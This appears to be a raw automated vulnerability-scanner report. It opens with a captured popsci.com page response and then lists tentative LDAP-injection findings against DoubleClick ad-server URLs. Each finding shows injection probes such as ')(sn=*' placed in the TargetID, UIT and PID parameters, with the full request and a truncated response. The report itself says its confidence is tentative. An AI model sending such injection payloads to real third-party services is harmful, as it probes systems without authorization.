Date: Sun, 30 Jan 2011 03:23:53 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=goltn6f70re8ngu8p1kkhfp8r7; expires=Tue, 22-Feb-2011 06:57:13 GMT; path=/; domain=.popsci.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 03:23:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4c D=688223
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
<a href="http://www.bmxmag.biz/existing.php">bmxmag-ps</a> -->
<!-- Begin comScore Tag -->
<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>
<script>
COMSCORE.beacon({
c1:2,
c2:"6035029",
c3:" ",
c4:" ",
c5:"",
c6:"",
c15:" "
});
</script>
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035029&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
<!-- End comScore Tag --> <!-- Start Quantcast tag -->
<script type="text/javascript">
_qoptions={
qacct:"p-cafODhhaQOlCs"
};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-cafODhhaQOlCs.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag --><!-- START Nielsen Online SiteCensus V6.0 -->
<!-- COPYRIGHT 2010 Nielsen Online -->
<script type="text/javascript">
(function () {
var d = new Image(1, 1);
d.onerror = d.onload = function () {
d.onerror = d.onload = null;
};
d.src = ["//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&cg=0&cc=1&si=", escape(window.location.href), "&rp=", escape(document.referrer), "&ts=compact&rnd=", (new Date()).getTime()].join('');
})();
</script>
<noscript>
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />
</div>
</noscript>
<!-- END Nielsen Online SiteCensus V6.0 -->
<!-- SiteCatalyst code version: H.13.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com --><script language="JavaScript"><!--
s_account="timepopsci"
//--></script>
<script language="JavaScript" src="/sites/all/modules/omniture/s_code.js"></script><scri
...[SNIP]...

2. LDAP injection
There are 26 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 [TargetID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The TargetID parameter appears to be vulnerable to LDAP injection attacks.

The payloads 91b687f6f8a6bf15)(sn=* and 91b687f6f8a6bf15)!(sn=* were each submitted in the TargetID parameter. The two requests produced different responses, which suggests that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=91b687f6f8a6bf15)(sn=*&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2981993/300x250_PostHoliday_Citrus.swf";
var gif = "http://s0.2mdn.net/2981993/300x250_PostHoliday_Citrus.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B1-0%3B0%3B57860936%3B4307-300/250%3B40005125/40022912/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B1-0%3B0%3B57860936%3B4307-300/250%3B40005125/40022912/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='&pid=57860936';
fv+='"';
var bgo=(bg=="")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');
var dcw = 800;
var dch = 600;
// IE
if(!window.innerWidth)
{
// st
...[SNIP]...

Request 2

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=91b687f6f8a6bf15)!(sn=*&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5236

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2981993/300x250_122510_POST_HOL_VORTEX.swf";
var gif = "http://s0.2mdn.net/2981993/300x250_122510_POST_HOL_VORTEX.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B0-0%3B0%3B57860936%3B4307-300/250%3B40005122/40022909/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B0-0%3B0%3B57860936%3B4307-300/250%3B40005122/40022909/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='&pid=57860936';
fv+='"';
var bgo=(bg=="")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');
var dcw = 800;
var dch = 600;
// IE
if(!window.innerWidth)
{
...[SNIP]...

2.2. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The TargetID parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8d3e8d3d71eda696)(sn=* and 8d3e8d3d71eda696)!(sn=* were each submitted in the TargetID parameter. The two requests produced different responses, which suggests that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8d3e8d3d71eda696)(sn=*&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Dec 21 15:59:08 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf";
var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 10;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/2
...[SNIP]...

Request 2

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8d3e8d3d71eda696)!(sn=*&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5679

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jan 26 14:26:13 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf";
var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctV
...[SNIP]...

2.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [UIT parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The UIT parameter appears to be vulnerable to LDAP injection attacks.

The payloads e20e5e04cd95acd2)(sn=* and e20e5e04cd95acd2)!(sn=* were each submitted in the UIT parameter. The two requests produced different responses, which suggests that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=e20e5e04cd95acd2)(sn=*&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Dec 21 15:59:08 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf";
var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 10;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/2
...[SNIP]...

Request 2

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=e20e5e04cd95acd2)!(sn=*&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5679

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jan 26 14:26:13 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf";
var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctV
...[SNIP]...

2.4. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The &PID parameter appears to be vulnerable to LDAP injection attacks.

The payloads 9a64f1d27d5c07b6)(sn=* and 9a64f1d27d5c07b6)!(sn=* were each submitted in the &PID parameter. The two requests produced different responses, which suggests that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6615

